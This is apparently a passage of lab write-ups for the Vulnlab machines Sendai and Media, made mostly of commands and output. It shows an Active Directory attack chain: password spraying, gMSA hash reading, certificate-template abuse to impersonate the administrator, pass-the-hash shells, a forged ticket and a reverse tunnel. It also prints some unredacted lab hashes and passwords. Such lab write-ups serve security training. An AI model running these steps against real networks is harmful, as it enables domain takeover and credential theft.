SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

change smb pass

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerating some more

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Do the bloodhound thing

We have a GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSAPasword of  mgtsvc$

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

Evil-WinRm to the box & PrivEsccheck.ps1

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+

.

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

findings

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse the template

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Run certipy-ad again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
running certipy-ad -find again, we now find
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"

Request Administrator Cert

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixxed the “NETBIOS connection with the remote host timed out” by changing the order to

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

obtain tgt & admin hash

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Other way to root not finished yet

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

Set up a chisel listener

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

then

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

and from sendai box

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

work in progress

as chisel is working fine

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

someting must be wrong with my impacket-mssqlclient Encryption required, switching to TLS

 

vulnlab-media

vulnlab media

a medium Windows machine

Tools used : ntlm_theft , fullpowers.exe , godpotato.exe

1st upload a video file ,catch the hash with Responder, and crack it with John

then ssh into the box

examine index.php , and query ApacheServer for a clue what todo

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

 

make everything ready as below

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

